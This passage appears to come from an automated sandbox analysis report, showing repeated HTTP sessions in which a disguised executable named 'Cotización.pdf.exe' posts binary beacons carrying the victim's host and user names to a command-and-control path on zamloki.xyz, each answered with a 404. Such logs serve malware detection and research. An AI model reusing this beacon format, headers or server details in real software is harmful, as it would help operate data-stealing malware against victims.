                                    Jul 21, 2021 17:02:48.902359962 CEST | 5674 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zvzLg6%2FvEfO0o6SG1VAXb2PbZaDnUUqfOloDETVNU4wY8CYd9Uua593%2FblpgOfam6No00wAG8LDh%2B%2F1OL4fe9IixMzMu1kZqKFCSrnFk1TyzylodMRJqtr58iQ9lrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ff9ee642b35-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    104         192.168.2.3  49843        172.67.155.45   80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:49.200373888 CEST  5675  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:49.218384981 CEST  5675  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:49.520839930 CEST  5676  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jzY4ER6KBkisyjAKM4XJfYID8xuW8mGpBVF%2FPyEo4Pk1h0XcUNWP5jQGdv18fTEgI%2F9CSlGhus%2BO3q9xxMgW9Lchr57sMY8zxRBJV1q3SSwOMFWU4mwypnZh6rT%2FbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ffd9fce4a67-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    105         192.168.2.3  49844        104.21.6.222    80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:49.807202101 CEST  5677  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:49.827281952 CEST  5677  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:50.081218958 CEST  5678  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j70VkB91amGAdQZMQqxt9YAPQ00GJhCSpSzklbfUZ8Zjmo%2BxfkdQB94XTHO1SjjBERO6tnoK7SCXc4CaNZH1ADuPepN1Anv%2BRxLjGCd8xL%2F7lo3wxAKcBap9FZ6bsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550015dfd2fa5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    106         192.168.2.3  49845        172.67.155.45   80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:50.493602991 CEST  5679  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:50.511837959 CEST  5679  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:50.894577026 CEST  5680  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OP2roXEsAcG5xcKkwQ1SL6zBnvudnKq6lR51mb7RlnjgoStQ4iTKpw0HQYhnFTySkwFVkW0B1iD8nNOQKwVj924DtkEXmndeOnz6Ry3PXSpyxHz1EEDsaRFxvKyEyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255005ac45175e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    107         192.168.2.3  49846        172.67.155.45   80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:51.150120974 CEST  5681  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:51.170741081 CEST  5681  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:51.427320004 CEST  5682  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZzIUKUFgz2qKBpps12WYelHR4biEZkWth1pXfOImBQeFD6mexrl6gFZAI91EZ1eB85Fjd35Os8J71UbYdgvqiiWwqrM16%2BD3f8K3w1VPXT2geIaQqyIoCyYi%2BDwvVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255009ce364dd6-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    108         192.168.2.3  49847        104.21.6.222    80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:51.615075111 CEST  5683  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:51.632952929 CEST  5683  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:51.885638952 CEST  5684  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cdWjG3iID8YsFRM6AHYLhEWSMCyK9MunZZRosCwHUaaYAaO2gbnL3SVMzqCnBlD7vnX1RJFx48rxfqIVU9ZZwI32tNNK2tWn7YGmIuPYK91%2F2zpV0VOHYjRj%2B1Dnug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725500cae9d062d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    109         192.168.2.3  49848        172.67.155.45   80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:52.226164103 CEST  5685  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:52.246175051 CEST  5685  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:52.794742107 CEST  5686  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I9hktZI7f3hF%2Br8oXK9EADPH%2BmTxuRPbWPozNTkqGYNKso9TT3CV%2Fi%2F8HCx1jSRYCjIGnzccIe5eJcKC%2FDXTLMtjrOrm4tnkYPznNnnqAUP3V7%2FmGy9YOCdhib%2B1sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550108a68176e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    11          192.168.2.3  49739        104.21.6.222    80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:01:54.095599890 CEST  1297  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:54.113643885 CEST  1298  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:54.363656044 CEST  1299  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dt262YAMj1b1cl%2FU2QPnzN56dRBKOoSXakQQOBRMR%2BmDpPuj905%2FknO0nol4cgw6ghoUhGP6xmG5Rc0AHhnc6YEdygerstyubWXXBtD%2FCfqw62Eqy9hjS07GDGKuCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ea52be32bce-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    110         192.168.2.3  49849        104.21.6.222    80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:53.008341074 CEST  5687  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:53.026616096 CEST  5687  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:53.277317047 CEST  5688  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u%2FQeXjFhr8fk%2FRtmc2rGpFA4ruI28HxXYwaEiG%2B9m%2BIg%2B37K7j4bpDhkNmU%2BPRdc3bR4S2vfL9emPvavM15TBNQ%2FTq5IdPPIR%2Fr%2B1WS2axQb8uutgtr%2BUdbNT7cjpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550155dba4e7f-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    111         192.168.2.3  49850        104.21.6.222    80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:53.500319004 CEST  5689  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:53.520234108 CEST  5689  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:53.760759115 CEST  5690  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YvgcFHGTRVx8gDCfZZqxu%2BIukjBs2d%2FbiexZBVf4CSWztcSjg31GpYgcGboturvOCd0iP54edCPfpuo0ngwLwGUEz30rps4Jy%2FLmAlt2XKqUt2fPBuzxfkJQ4JaCZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725501878430eab-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    112         192.168.2.3  49851        172.67.155.45   80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:54.057066917 CEST  5691  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:54.075777054 CEST  5691  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:54.343905926 CEST  5692  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H4fSbvld4Q9y7CWGnF5wz%2BEtmg2JFjUF8av%2Fk%2BPOc11kYouSN7RpUsYgqIwGEZWeWAw%2BTs5i1NRlkoHq62MaF5yTnlJJGZLfjCCTbK6iENq5fJhav563Hd3sXPsdsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725501bee824e6e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    113         192.168.2.3  49852        104.21.6.222    80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:54.588300943 CEST  5692  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:54.608359098 CEST  5693  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:54.844561100 CEST  5693  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5Tt3W3re%2B8uvY7BCuFqKYkVxCDsnOK9YtjbvK%2Bz84aZ1cab5HvNKxALQGVP%2Fl1Mdv9q0rUjPtuO%2FzcABw6qsKcsYWtXASGWVDl0KQOsRU%2BM0K1FO1PEkxahd4%2Bt%2FIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725501f48ef4a9d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    114         192.168.2.3  49853        172.67.155.45   80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:55.084563971 CEST  5694  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:55.102489948 CEST  5695  OUT  Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:55.376800060 CEST  5695  IN  HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9N7aW5rVj6z%2BNYo3MLOIWDlpALN3GrLNgVKfchYUCgYxLf0fpnY31P6L0a0hVLCdp4u50VCIiah0Ou5TDSk6p8HtkN7vhfMJ0d2rtMA7wgg%2FbjK3Y2QONZqkSqjtzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550225a6b1f4d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                    115         192.168.2.3  49854        104.21.6.222    80                C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp  kBytes transferred  Direction  Data
                                    Jul 21, 2021 17:02:55.635201931 CEST  5696  OUT  POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:55.655184984 CEST | 5696 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:55.908862114 CEST | 5697 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=prl26dPhuC%2Fqb%2BZzybr1U9PofPe9QwYqKUCe%2F0KutB35O%2BYtqKDR7piRvoQLdW6u2QRUXi01AAJJUwQsLz283EA5x%2FMeH49dNq0fxNSziCUvaQQc%2BIyYmfByMzO4DQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255025ca5f1f15-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
